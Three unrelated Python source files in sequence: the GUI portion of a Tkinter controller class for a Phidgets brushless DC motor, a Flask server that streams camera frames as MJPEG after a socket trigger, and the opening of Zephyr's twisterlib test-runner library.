self.Velocity_PhidgetsUnits_Scale.set(self.Velocity_PhidgetsUnits_TO_BE_SET)
self.Velocity_PhidgetsUnits_Scale.grid(row=2, column=2, padx=1, pady=1, columnspan=2, rowspan=1)
self.Velocity_PhidgetsUnits_Scale["troughcolor"] = self.TKinter_LightGreenColor
#if self.ControlMode == "position":
# self.Velocity_PhidgetsUnits_Scale["state"] = "disabled"
#elif self.ControlMode == "velocity":
# self.Velocity_PhidgetsUnits_Scale["troughcolor"] = self.TKinter_LightGreenColor
#################################################
#################################################
self.Acceleration_PhidgetsUnits_ScaleLabel = Label(self.myFrame, text="Acceleration", width=20)
self.Acceleration_PhidgetsUnits_ScaleLabel.grid(row=3, column=1, padx=1, pady=1, columnspan=1, rowspan=1)
self.Acceleration_PhidgetsUnits_ScaleValue = DoubleVar()
self.Acceleration_PhidgetsUnits_Scale = Scale(self.myFrame, \
from_=self.AccelerationMinLimit_PhidgetsUnits_FromDevice,\
to=self.AccelerationMaxLimit_PhidgetsUnits_UserSet, \
#tickinterval=(self.Acceleration_PhidgetsUnits_max - self.Acceleration_PhidgetsUnits_min) / 2.0,\
orient=HORIZONTAL,\
borderwidth=2,\
showvalue=1,\
width=self.TkinterScaleWidth,\
length=self.TkinterScaleLength,\
resolution=0.001,\
variable=self.Acceleration_PhidgetsUnits_ScaleValue)
self.Acceleration_PhidgetsUnits_Scale.bind('<Button-1>', lambda event, name="Acceleration": self.Acceleration_PhidgetsUnits_ScaleResponse(event, name)) #Use both '<Button-1>' or '<ButtonRelease-1>'
self.Acceleration_PhidgetsUnits_Scale.bind('<B1-Motion>', lambda event, name="Acceleration": self.Acceleration_PhidgetsUnits_ScaleResponse(event, name))
self.Acceleration_PhidgetsUnits_Scale.bind('<ButtonRelease-1>', lambda event, name="Acceleration": self.Acceleration_PhidgetsUnits_ScaleResponse(event, name)) #Use both '<Button-1>' or '<ButtonRelease-1>'
self.Acceleration_PhidgetsUnits_Scale.set(self.Acceleration_PhidgetsUnits_TO_BE_SET)
self.Acceleration_PhidgetsUnits_Scale.grid(row=3, column=2, padx=1, pady=1, columnspan=2, rowspan=1)
if self.ControlMode == "position":
pass #Color gets controlled by engaged flag within the main GUI loop
elif self.ControlMode == "velocity":
self.Acceleration_PhidgetsUnits_Scale["troughcolor"] = self.TKinter_LightGreenColor
#################################################
#################################################
self.DeadBand_PosControl_PhidgetsUnits_ScaleLabel = Label(self.myFrame, text="DeadBand", width=20)
self.DeadBand_PosControl_PhidgetsUnits_ScaleLabel.grid(row=4, column=1, padx=1, pady=1, columnspan=1, rowspan=1)
self.DeadBand_PosControl_PhidgetsUnits_ScaleValue = DoubleVar()
self.DeadBand_PosControl_PhidgetsUnits_Scale = Scale(self.myFrame, \
from_=0,\
to= self.PositionMaxLimit_PhidgetsUnits_UserSet,\
#tickinterval=(self.DeadBand_PosControl_PhidgetsUnits_max - self.DeadBand_PosControl_PhidgetsUnits_min) / 2.0,\
orient=HORIZONTAL,\
borderwidth=2,\
showvalue=1,\
width=self.TkinterScaleWidth,\
length=self.TkinterScaleLength,\
resolution=0.1,\
variable=self.DeadBand_PosControl_PhidgetsUnits_ScaleValue)
self.DeadBand_PosControl_PhidgetsUnits_Scale.bind('<Button-1>', lambda event, name="DeadBand": self.DeadBand_PosControl_PhidgetsUnits_ScaleResponse(event, name)) #Use both '<Button-1>' or '<ButtonRelease-1>'
self.DeadBand_PosControl_PhidgetsUnits_Scale.bind('<B1-Motion>', lambda event, name="DeadBand": self.DeadBand_PosControl_PhidgetsUnits_ScaleResponse(event, name))
self.DeadBand_PosControl_PhidgetsUnits_Scale.bind('<ButtonRelease-1>', lambda event, name="DeadBand": self.DeadBand_PosControl_PhidgetsUnits_ScaleResponse(event, name)) #Use both '<Button-1>' or '<ButtonRelease-1>'
self.DeadBand_PosControl_PhidgetsUnits_Scale.set(self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET)
self.DeadBand_PosControl_PhidgetsUnits_Scale.grid(row=4, column=2, padx=1, pady=1, columnspan=2, rowspan=1)
if self.ControlMode == "velocity":
self.DeadBand_PosControl_PhidgetsUnits_Scale["state"] = "disabled"
#################################################
'''
###########################################################
###########################################################
self.Entry_Width = 15
self.Entry_Label_Width = 15
self.Entry_FontSize = 8
self.AllEntriesFrame = Frame(self.myFrame)
self.AllEntriesFrame["borderwidth"] = 2
#self.AllEntriesFrame["relief"] = "ridge"
self.AllEntriesFrame.grid(row=2, column=0, padx=1, pady=1, columnspan=10, rowspan=1, sticky="W")
###########################################################
###########################################################
###########################################################
###########################################################
self.VelocityMaxLimit_PhidgetsUnits_label = Label(self.AllEntriesFrame, text="VelocityMax", width=self.Entry_Label_Width)
self.VelocityMaxLimit_PhidgetsUnits_label.grid(row=0, column=0, padx=1, pady=1, columnspan=1, rowspan=1)
self.VelocityMaxLimit_PhidgetsUnits_StringVar = StringVar()
self.VelocityMaxLimit_PhidgetsUnits_StringVar.set(self.VelocityMaxLimit_PhidgetsUnits_UserSet)
self.VelocityMaxLimit_PhidgetsUnits_TextInputBox = Entry(self.AllEntriesFrame,
font=("Helvetica", int(self.Entry_FontSize)),
state="normal",
width=int(self.Entry_Width),
textvariable=self.VelocityMaxLimit_PhidgetsUnits_StringVar,
justify='center')
self.VelocityMaxLimit_PhidgetsUnits_TextInputBox.bind('<Return>', lambda event, name = "<Return>": self.VelocityMaxLimit_PhidgetsUnits_TextInputBoxResponse(event, name))
#self.VelocityMaxLimit_PhidgetsUnits_TextInputBox.bind('<Button-1>', lambda event, name = "<Button-1>": self.VelocityMaxLimit_PhidgetsUnits_TextInputBoxResponse(event, name))
#self.VelocityMaxLimit_PhidgetsUnits_TextInputBox.bind('<Button-2>', lambda event, name = "<Button-2>": self.VelocityMaxLimit_PhidgetsUnits_TextInputBoxResponse(event, name))
#self.VelocityMaxLimit_PhidgetsUnits_TextInputBox.bind('<Button-3>', lambda event, name = "<Button-3>": self.VelocityMaxLimit_PhidgetsUnits_TextInputBoxResponse(event, name))
#self.VelocityMaxLimit_PhidgetsUnits_TextInputBox.bind('<Leave>', lambda event, name = "<Leave>": self.VelocityMaxLimit_PhidgetsUnits_TextInputBoxResponse(event, name))
self.VelocityMaxLimit_PhidgetsUnits_TextInputBox.grid(row=1, column=0, padx=0, pady=0, columnspan=1, rowspan=1)
###########################################################
###########################################################
'''
###########################################################
###########################################################
self.Button_Width = 15
self.AllButtonsFrame = Frame(self.myFrame)
self.AllButtonsFrame["borderwidth"] = 2
#self.AllButtonsFrame["relief"] = "ridge"
self.AllButtonsFrame.grid(row=0, column=2, padx=1, pady=1, columnspan=1, rowspan=1, sticky="W")
###########################################################
###########################################################
###########################################################
###########################################################
self.HomeMotorInPlaceButton = Button(self.AllButtonsFrame, text='HomeInPlace', state="normal", width=self.Button_Width, command=lambda i=1: self.HomeMotorInPlaceButtonResponse())
self.HomeMotorInPlaceButton.grid(row=0, column=0, padx=1, pady=1, columnspan=1, rowspan=1)
if self.ControlMode == "position":
self.HomeMotorInPlaceButton["bg"] = self.TKinter_LightGreenColor
elif self.ControlMode == "velocity":
self.HomeMotorInPlaceButton["state"] = "disabled"
###########################################################
###########################################################
###########################################################
###########################################################
self.EngagedStateButton = Button(self.AllButtonsFrame, text='Engaged: x', state="normal", width=self.Button_Width, command=lambda i=1: self.EngagedStateButtonResponse())
self.EngagedStateButton.grid(row=0, column=1, padx=1, pady=1, columnspan=1, rowspan=1)
if self.ControlMode == "velocity":
self.EngagedStateButton["state"] = "disabled"
###########################################################
###########################################################
###########################################################
###########################################################
self.StopMotorButton = Button(self.AllButtonsFrame, text='Stop Motor', state="normal", width=self.Button_Width, command=lambda i=1: self.StopMotorButtonResponse())
self.StopMotorButton.grid(row=0, column=2, padx=1, pady=1, columnspan=1, rowspan=1)
self.StopMotorButton["bg"] = self.TKinter_LightGreenColor
###########################################################
###########################################################
########################
if self.RootIsOwnedExternallyFlag == 0: #This class object owns root and must handle it properly
self.root.protocol("WM_DELETE_WINDOW", self.ExitProgram_Callback)
self.root.after(self.GUI_RootAfterCallbackInterval_Milliseconds, self.GUI_update_clock)
self.GUI_ready_to_be_updated_flag = 1
self.root.mainloop()
else:
self.GUI_ready_to_be_updated_flag = 1
########################
########################
if self.RootIsOwnedExternallyFlag == 0: #This class object owns root and must handle it properly
self.root.quit() # Stop the GUI thread, MUST BE CALLED FROM GUI_Thread
self.root.destroy() # Close down the GUI thread, MUST BE CALLED FROM GUI_Thread
########################
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def Position_PhidgetsUnits_ScaleResponse(self, event, name):
self.Position_PhidgetsUnits_TO_BE_SET = self.Position_PhidgetsUnits_ScaleValue.get()
self.Position_PhidgetsUnits_NeedsToBeChangedFlag = 1
#self.MyPrint_WithoutLogFile("Position_PhidgetsUnits_ScaleResponse: Position set to: " + str(self.Position_PhidgetsUnits_TO_BE_SET))
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def Velocity_PhidgetsUnits_ScaleResponse(self, event, name):
self.Velocity_PhidgetsUnits_TO_BE_SET = self.Velocity_PhidgetsUnits_ScaleValue.get()
self.Velocity_PhidgetsUnits_NeedsToBeChangedFlag = 1
#self.MyPrint_WithoutLogFile("Velocity_PhidgetsUnits_ScaleResponse: Velocity set to: " + str(self.Velocity_PhidgetsUnits_TO_BE_SET))
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def Acceleration_PhidgetsUnits_ScaleResponse(self, event, name):
self.Acceleration_PhidgetsUnits_TO_BE_SET = self.Acceleration_PhidgetsUnits_ScaleValue.get()
self.Acceleration_PhidgetsUnits_NeedsToBeChangedFlag = 1
#self.MyPrint_WithoutLogFile("Acceleration_PhidgetsUnits_ScaleResponse: Acceleration set to: " + str(self.Acceleration_PhidgetsUnits_TO_BE_SET))
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def DeadBand_PosControl_PhidgetsUnits_ScaleResponse(self, event, name):
self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET = self.DeadBand_PosControl_PhidgetsUnits_ScaleValue.get()
self.DeadBand_PosControl_PhidgetsUnits_NeedsToBeChangedFlag = 1
#self.MyPrint_WithoutLogFile("DeadBand_PosControl_PhidgetsUnits_ScaleResponse: DeadBand set to: " + str(self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET))
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def SetEngagedState(self, StateToBeSet):
if StateToBeSet not in [0, 1]:
self.MyPrint_WithoutLogFile("SetEngagedState ERROR: StateToBeSet must be 0 or 1.")
return 0
else:
self.EngagedState_TO_BE_SET = StateToBeSet
self.EngagedState_NeedsToBeChangedFlag = 1
return 1
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def EngagedStateButtonResponse(self):
if self.EngagedState_PhidgetsUnits_FromDevice == 1:
self.SetEngagedState(0)
else:
self.SetEngagedState(1)
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def StopMotorButtonResponse(self):
self.StopMotor_NeedsToBeChangedFlag = 1
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def HomeMotorInPlaceButtonResponse(self):
self.HomeMotorInPlace_NeedsToBeHomedFlag = 1
##########################################################################################################
##########################################################################################################
'''
##########################################################################################################
##########################################################################################################
def VelocityMaxLimit_PhidgetsUnits_TextInputBoxResponse(self, event=None, name="default"):
try:
if name == "<Button-1>" or name == "<Button-2>" or name == "<Button-3>" or name == "<Leave>":
pass
elif name == "<Return>": # When user hits 'Return'
VelocityMaxLimit_PhidgetsUnits_UserSet_temp = float(self.VelocityMaxLimit_PhidgetsUnits_StringVar.get())
self.VelocityMaxLimit_PhidgetsUnits_UserSet = self.LimitNumber_StringVarObject(
-1.0 * self.VelocityMaxLimit_PhidgetsUnits_FromDevice,
self.VelocityMaxLimit_PhidgetsUnits_FromDevice,
VelocityMaxLimit_PhidgetsUnits_UserSet_temp,
self.VelocityMaxLimit_PhidgetsUnits_StringVar)
self.MyPrint_WithoutLogFile("VelocityMaxLimit_PhidgetsUnits_TextInputBoxResponse 'Return' event: \n" + str(
self.VelocityMaxLimit_PhidgetsUnits_UserSet))
self.Velocity_PhidgetsUnits_TO_BE_SET = self.VelocityMaxLimit_PhidgetsUnits_UserSet
self.Velocity_PhidgetsUnits_NeedsToBeChangedFlag = 1
except:
pass
##########################################################################################################
##########################################################################################################
'''
##########################################################################################################
##########################################################################################################
def GUI_update_clock(self):
#######################################################
#######################################################
#######################################################
#######################################################
if self.USE_GUI_FLAG == 1 and self.EXIT_PROGRAM_FLAG == 0:
#######################################################
#######################################################
#######################################################
if self.GUI_ready_to_be_updated_flag == 1:
#######################################################
#######################################################
try:
#########################################################
self.EngagedStateButton["text"] = "Engaged: " + str(self.EngagedState_PhidgetsUnits_FromDevice)
if self.EngagedState_PhidgetsUnits_FromDevice == 0:
self.EngagedStateButton["bg"] = self.TKinter_LightRedColor
elif self.EngagedState_PhidgetsUnits_FromDevice == 1:
self.EngagedStateButton["bg"] = self.TKinter_LightGreenColor
else:
self.EngagedStateButton["bg"] = self.TKinter_DefaultGrayColor
#########################################################
#########################################################
if self.ControlMode == "position":
if self.EngagedState_PhidgetsUnits_FromDevice == 1:
self.Position_PhidgetsUnits_Scale["troughcolor"] = self.TKinter_LightGreenColor
self.Acceleration_PhidgetsUnits_Scale["troughcolor"] = self.TKinter_LightGreenColor
self.DeadBand_PosControl_PhidgetsUnits_Scale["troughcolor"] = self.TKinter_LightGreenColor
else:
self.Position_PhidgetsUnits_Scale["troughcolor"] = self.TKinter_LightRedColor
self.Acceleration_PhidgetsUnits_Scale["troughcolor"] = self.TKinter_LightRedColor
self.DeadBand_PosControl_PhidgetsUnits_Scale["troughcolor"] = self.TKinter_LightRedColor
#########################################################
#########################################################
if self.Position_PhidgetsUnits_GUI_NeedsToBeChangedFlag == 1:
self.Position_PhidgetsUnits_Scale.set(self.Position_PhidgetsUnits_TO_BE_SET)
self.Position_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 0
#########################################################
#########################################################
if self.Velocity_PhidgetsUnits_GUI_NeedsToBeChangedFlag == 1:
self.Velocity_PhidgetsUnits_Scale.set(self.Velocity_PhidgetsUnits_TO_BE_SET)
self.Velocity_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 0
#########################################################
#########################################################
if self.Acceleration_PhidgetsUnits_GUI_NeedsToBeChangedFlag == 1:
self.Acceleration_PhidgetsUnits_Scale.set(self.Acceleration_PhidgetsUnits_TO_BE_SET)
self.Acceleration_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 0
#########################################################
#########################################################
if self.DeadBand_PosControl_PhidgetsUnits_GUI_NeedsToBeChangedFlag == 1:
self.DeadBand_PosControl_PhidgetsUnits_Scale.set(self.DeadBand_PosControl_PhidgetsUnits_TO_BE_SET)
self.DeadBand_PosControl_PhidgetsUnits_GUI_NeedsToBeChangedFlag = 0
#########################################################
#######################################################
self.data_label["text"] = "*** ControlMode: " + self.ControlMode + " ***" +\
"\nTime: " + self.ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self.CurrentTime_CalculatedFromMainThread, 0, 3) + \
"\nFrequency MainThread(Hz): " + self.ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self.DataStreamingFrequency_CalculatedFromMainThread, 0, 3) + \
"\nFrequency Phidgets ON CHANGE Position Rx, can slow to 0 (Hz): " + self.ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self.DataStreamingFrequency_OnPositionChangeCallbackFunction, 0, 3) + \
"\nTemperature_DegC_FromDevice: " + self.ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self.Temperature_DegC_FromDevice, 0, 3) + \
"\nPosition_PhidgetsUnits_FromDevice: " + self.ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self.Position_PhidgetsUnits_FromDevice, 0, 3) + \
"\nVelocity_PhidgetsUnits_FromDevice: " + self.ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self.Velocity_PhidgetsUnits_FromDevice, 0, 3) + \
"\nVelocityStall_PhidgetsUnits_FromDevice: " + self.ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self.VelocityStall_PhidgetsUnits_FromDevice, 0, 3) + \
"\nDutyCycle_PhidgetsUnits_FromDevice: " + self.ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self.DutyCycle_PhidgetsUnits_FromDevice, 0, 3) + \
"\nAcceleration_PhidgetsUnits_FromDevice: " + self.ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self.Acceleration_PhidgetsUnits_FromDevice, 0, 3) + \
"\nDeadBand_PosControl_PhidgetsUnits_FromDevice: " + self.ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self.DeadBand_PosControl_PhidgetsUnits_FromDevice, 0, 3) + \
"\nEngagedState_PhidgetsUnits_FromDevice: " + self.ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self.EngagedState_PhidgetsUnits_FromDevice, 0, 3)
#"\n***Position_PhidgetsUnits_TO_BE_SET: " + str(self.Position_PhidgetsUnits_TO_BE_SET)
#######################################################
#######################################################
self.PrintToGui_Label.config(text=self.PrintToGui_Label_TextInput_Str)
#######################################################
except:
exceptions = sys.exc_info()[0]
print("PhidgetBrushlessDCmotorDCC1100controller_ReubenPython2and3Class GUI_update_clock ERROR: Exceptions: %s" % exceptions)
traceback.print_exc()
#######################################################
#######################################################
#######################################################
#######################################################
if self.RootIsOwnedExternallyFlag == 0: # This class object owns root and must handle it properly
self.root.after(self.GUI_RootAfterCallbackInterval_Milliseconds, self.GUI_update_clock)
#######################################################
#######################################################
#######################################################
#######################################################
#######################################################
#######################################################
#######################################################
#######################################################
#######################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def IsInputList(self, input, print_result_flag = 0):
result = isinstance(input, list)
if print_result_flag == 1:
self.MyPrint_WithoutLogFile("IsInputList: " + str(result))
return result
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput(self, input, number_of_leading_numbers=4, number_of_decimal_places=3):
IsListFlag = self.IsInputList(input)
if IsListFlag == 0:
float_number_list = [input]
else:
float_number_list = list(input)
float_number_list_as_strings = []
for element in float_number_list:
try:
element = float(element)
prefix_string = "{:." + str(number_of_decimal_places) + "f}"
element_as_string = prefix_string.format(element)
float_number_list_as_strings.append(element_as_string)
except:
self.MyPrint_WithoutLogFile(self.TellWhichFileWereIn() + ": ConvertFloatToStringWithNumberOfLeadingNumbersAndDecimalPlaces_NumberOrListInput ERROR: " + str(element) + " cannot be turned into a float")
return -1
StringToReturn = ""
if IsListFlag == 0:
StringToReturn = float_number_list_as_strings[0].zfill(number_of_leading_numbers + number_of_decimal_places + 1 + 1) # +1 for sign, +1 for decimal place
else:
StringToReturn = "["
for index, StringElement in enumerate(float_number_list_as_strings):
if float_number_list[index] >= 0:
StringElement = "+" + StringElement # So that our strings always have either + or - signs to maintain the same string length
StringElement = StringElement.zfill(number_of_leading_numbers + number_of_decimal_places + 1 + 1) # +1 for sign, +1 for decimal place
if index != len(float_number_list_as_strings) - 1:
StringToReturn = StringToReturn + StringElement + ", "
else:
StringToReturn = StringToReturn + StringElement + "]"
return StringToReturn
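        # Illustrative examples (added; not in the original source), using the
        # defaults of 4 leading digits and 3 decimal places:
        #   scalar 12.3456     -> "00012.346"
        #   list   [1.0, -2.5] -> "[+0001.000, -0002.500]"
        # Note the scalar path does not prepend a "+" sign; only list elements
        # get an explicit sign so that all entries share the same width.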
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def limitNumber(self, min_val, max_val, test_val):
#test_val = float(test_val) #MUST HAVE THIS LINE TO CATCH STRINGS PASSED INTO THE FUNCTION
if test_val > max_val:
test_val = max_val
#self.MyPrint_WithoutLogFile("limitNumber: input of " + str(test_val) + " was capped at maximum of " + str(max_val) + ".")
elif test_val < min_val:
test_val = min_val
#self.MyPrint_WithoutLogFile("limitNumber: input of " + str(test_val) + " was capped at minimum of " + str(min_val) + ".")
        else:
            pass  # value already within [min_val, max_val]; no capping needed
            #self.MyPrint_WithoutLogFile("limitNumber: input of " + str(test_val) + " was within limits and not capped.")
return test_val
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def LimitNumber_StringVarObject(self, min_val, max_val, test_val, StringVarObject, number_of_decimal_places = 1):
try:
test_val = float(test_val)
if test_val > max_val:
test_val = max_val
#self.MyPrint_WithoutLogFile("Original input of " + str(test_val) + " capped at a maximum of " + str(max_val))
elif test_val < min_val:
test_val = min_val
#self.MyPrint_WithoutLogFile("Original input of " + str(test_val) + " capped at a minimum of " + str(min_val))
            else:
                pass  # value already within limits; no capping needed
                #self.MyPrint_WithoutLogFile("Original input of " + str(test_val) + " not capped at a minimum of " + str(min_val) + " or maximum of " + str(max_val))
prefix_string = "{:." + str(number_of_decimal_places) + "f}"
string_to_set = prefix_string.format(test_val)
StringVarObject.set(str(string_to_set)) # Reset the text, overwriting the bad value that was entered.
return test_val
except:
exceptions = sys.exc_info()[0]
self.MyPrint_WithoutLogFile("LimitNumber_StringVarObject ERROR: Exceptions: %s" % exceptions)
return -1111111111
##########################################################################################################
##########################################################################################################
##########################################################################################################
##########################################################################################################
def MyPrint_WithoutLogFile(self, input_string):
input_string = str(input_string)
if input_string != "":
#input_string = input_string.replace("\n", "").replace("\r", "")
################################ Write to console
            # Some people reported that print() crashed in PyInstaller-built applications and that sys.stdout.write fixed this.
# http://stackoverflow.com/questions/13429924/pyinstaller-packaged-application-works-fine-in-console-mode-crashes-in-window-m
if self.PrintToConsoleFlag == 1:
sys.stdout.write(input_string + "\n")
################################
################################ Write to GUI
self.PrintToGui_Label_TextInputHistory_List.append(self.PrintToGui_Label_TextInputHistory_List.pop(0)) #Shift the list
self.PrintToGui_Label_TextInputHistory_List[-1] = str(input_string) #Add the latest value
self.PrintToGui_Label_TextInput_Str = ""
for Counter, Line in enumerate(self.PrintToGui_Label_TextInputHistory_List):
self.PrintToGui_Label_TextInput_Str = self.PrintToGui_Label_TextInput_Str + Line
if Counter < len(self.PrintToGui_Label_TextInputHistory_List) - 1:
self.PrintToGui_Label_TextInput_Str = self.PrintToGui_Label_TextInput_Str + "\n"
################################
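        # Behavior note (added for clarity): PrintToGui_Label_TextInputHistory_List
        # acts as a fixed-length rolling buffer. Each call drops the oldest line,
        # appends the newest, and rebuilds the newline-joined string that
        # GUI_update_clock later writes into the PrintToGui label.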
##########################################################################################################
##########################################################################################################
|
face_streaming_server.py
|
import cv2
import time
import threading
from flask import Response, Flask
import os
import sys
import socket
import select
# Image frame passed to the Flask object
global video_frame
video_frame = None
# Lock guarding thread-safe delivery of frames to the various browsers.
global thread_lock
thread_lock = threading.Lock()
# GStreamer pipeline for accessing the Raspberry camera
GSTREAMER_PIPELINE = 'nvarguscamerasrc ! video/x-raw(memory:NVMM), width=1920, height=1080, format=(string)NV12, framerate=21/1 ! nvvidconv flip-method=0 ! video/x-raw, width=960, height=616, format=(string)BGRx ! videoconvert ! video/x-raw, format=(string)BGR ! appsink wait-on-eos=false max-buffers=1 drop=True'
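# Note (added): nvarguscamerasrc is the NVIDIA Jetson CSI camera source, so the
# pipeline above actually targets a Jetson board rather than a Raspberry Pi
# camera stack. A minimal fallback sketch for systems without this GStreamer
# plugin, assuming a V4L2 webcam at index 0:
#
#   video_capture = cv2.VideoCapture(0)  # instead of (GSTREAMER_PIPELINE, cv2.CAP_GSTREAMER)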
# Create the Flask object for the application
app = Flask(__name__)
def restart():
print("프로그램 재시작")
executable = sys.executable
args = sys.argv[:]
args.insert(0, sys.executable)
time.sleep(1)
os.execvp(executable, args)
def captureFrames():
global video_frame, thread_lock
start_time = time.time()
    # Capture video with OpenCV
video_capture = cv2.VideoCapture(GSTREAMER_PIPELINE, cv2.CAP_GSTREAMER)
    while video_capture.isOpened():
return_key, frame = video_capture.read()
duration = time.time() - start_time
if not return_key:
break
        # Make a copy of the frame and store it in the video_frame variable
with thread_lock:
video_frame = frame.copy()
        # NOTE: cv2.waitKey only receives key events while an OpenCV window has
        # focus; in this headless server it effectively always returns -1.
        key = cv2.waitKey(30) & 0xff
        if key == 27:  # ESC
            break
        if duration >= 30:
            print("30 seconds elapsed; restarting")
            video_capture.release()
            restart()
            break
video_capture.release()
def encodeFrame():
global thread_lock
while True:
        # Acquire thread_lock to access the video_frame variable
with thread_lock:
global video_frame
if video_frame is None:
continue
return_key, encoded_image = cv2.imencode(".jpg", video_frame)
if not return_key:
continue
        # Yield the resulting image as a byte array
yield (b'--frame\r\n' b'Content-Type: image/jpeg\r\n\r\n' +
bytearray(encoded_image) + b'\r\n')
@app.route("/")
def streamFrames():
return Response(encodeFrame(), mimetype="multipart/x-mixed-replace; boundary=frame")
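# Usage sketch (added; assumes the app.run() call below): once the server is
# up, the MJPEG stream can be viewed from another machine on the same network:
#
#   http://192.168.0.50:8000/        (in a browser)
#   curl http://192.168.0.50:8000/   (prints the multipart JPEG frames)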
if __name__ == '__main__':
IP = '192.168.0.50'
PORT = 5040
ADDR = (IP, PORT)
SIZE = 1024
Server_socket1 = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Server_socket1.bind(ADDR)
Server_socket1.listen()
read_socket_list = [Server_socket1]
    conn_read_socket_list, conn_write_socket_list, conn_except_socket_list = select.select(read_socket_list, [], [])
for conn_read_socket in conn_read_socket_list:
if conn_read_socket == Server_socket1:
client_socket, client_addr = Server_socket1.accept()
msg = client_socket.recv(SIZE)
if msg.decode('UTF-8') == 'A':
print("실행합니다.")
                # Create a thread and attach the frame-capturing method to it
process_thread = threading.Thread(target=captureFrames)
process_thread.daemon = True
# Start the thread
process_thread.start()
    # Start the Flask web application.
    # Binding to the host's LAN address (192.168.0.50 here) makes the web app
    # reachable from other machines on the same network.
app.run("192.168.0.50", port="8000")
|
twisterlib.py
|
#!/usr/bin/env python3
# vim: set syntax=python ts=4 :
#
# Copyright (c) 2018 Intel Corporation
# SPDX-License-Identifier: Apache-2.0
import os
import contextlib
import string
import mmap
import math
import sys
import re
import subprocess
import select
import shutil
import shlex
import signal
import hashlib
import threading
from datetime import datetime
from collections import OrderedDict
import queue
import time
import csv
import glob
import random
import xml.etree.ElementTree as ET
import logging
from pathlib import Path
from distutils.spawn import find_executable
from colorama import Fore
import pickle
import platform
import yaml
import json
from multiprocessing import Lock, Process, Value
from typing import List
try:
# Use the C LibYAML parser if available, rather than the Python parser.
# It's much faster.
from yaml import CSafeLoader as SafeLoader
from yaml import CDumper as Dumper
except ImportError:
from yaml import SafeLoader, Dumper
try:
import serial
except ImportError:
print("Install pyserial python module with pip to use --device-testing option.")
try:
from tabulate import tabulate
except ImportError:
print("Install tabulate python module with pip to use --device-testing option.")
try:
import psutil
except ImportError:
print("Install psutil python module with pip to run in Qemu.")
try:
import pty
except ImportError as capture_error:
if os.name == "nt": # "nt" means that program is running on Windows OS
pass # "--device-serial-pty" option is not supported on Windows OS
else:
raise capture_error
ZEPHYR_BASE = os.getenv("ZEPHYR_BASE")
if not ZEPHYR_BASE:
sys.exit("$ZEPHYR_BASE environment variable undefined")
# This is needed to load edt.pickle files.
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts", "dts",
"python-devicetree", "src"))
from devicetree import edtlib # pylint: disable=unused-import
# Use this for internal comparisons; that's what canonicalization is
# for. Don't use it when invoking other components of the build system
# to avoid confusing and hard to trace inconsistencies in error messages
# and logs, generated Makefiles, etc. compared to when users invoke these
# components directly.
# Note "normalization" is different from canonicalization, see os.path.
canonical_zephyr_base = os.path.realpath(ZEPHYR_BASE)
sys.path.insert(0, os.path.join(ZEPHYR_BASE, "scripts/"))
import scl
import expr_parser
logger = logging.getLogger('twister')
logger.setLevel(logging.DEBUG)
class ExecutionCounter(object):
def __init__(self, total=0):
self._done = Value('i', 0)
self._passed = Value('i', 0)
self._skipped_configs = Value('i', 0)
self._skipped_runtime = Value('i', 0)
self._skipped_filter = Value('i', 0)
self._skipped_cases = Value('i', 0)
self._error = Value('i', 0)
self._failed = Value('i', 0)
self._total = Value('i', total)
self._cases = Value('i', 0)
self.lock = Lock()
def summary(self):
logger.debug("--------------------------------")
logger.debug(f"Total Test suites: {self.total}")
logger.debug(f"Total Test cases: {self.cases}")
logger.debug(f"Skipped test cases: {self.skipped_cases}")
logger.debug(f"Completed Testsuites: {self.done}")
logger.debug(f"Passing Testsuites: {self.passed}")
logger.debug(f"Failing Testsuites: {self.failed}")
logger.debug(f"Skipped Testsuites: {self.skipped_configs}")
logger.debug(f"Skipped Testsuites (runtime): {self.skipped_runtime}")
logger.debug(f"Skipped Testsuites (filter): {self.skipped_filter}")
logger.debug(f"Errors: {self.error}")
logger.debug("--------------------------------")
@property
def cases(self):
with self._cases.get_lock():
return self._cases.value
@cases.setter
def cases(self, value):
with self._cases.get_lock():
self._cases.value = value
@property
def skipped_cases(self):
with self._skipped_cases.get_lock():
return self._skipped_cases.value
@skipped_cases.setter
def skipped_cases(self, value):
with self._skipped_cases.get_lock():
self._skipped_cases.value = value
@property
def error(self):
with self._error.get_lock():
return self._error.value
@error.setter
def error(self, value):
with self._error.get_lock():
self._error.value = value
@property
def done(self):
with self._done.get_lock():
return self._done.value
@done.setter
def done(self, value):
with self._done.get_lock():
self._done.value = value
@property
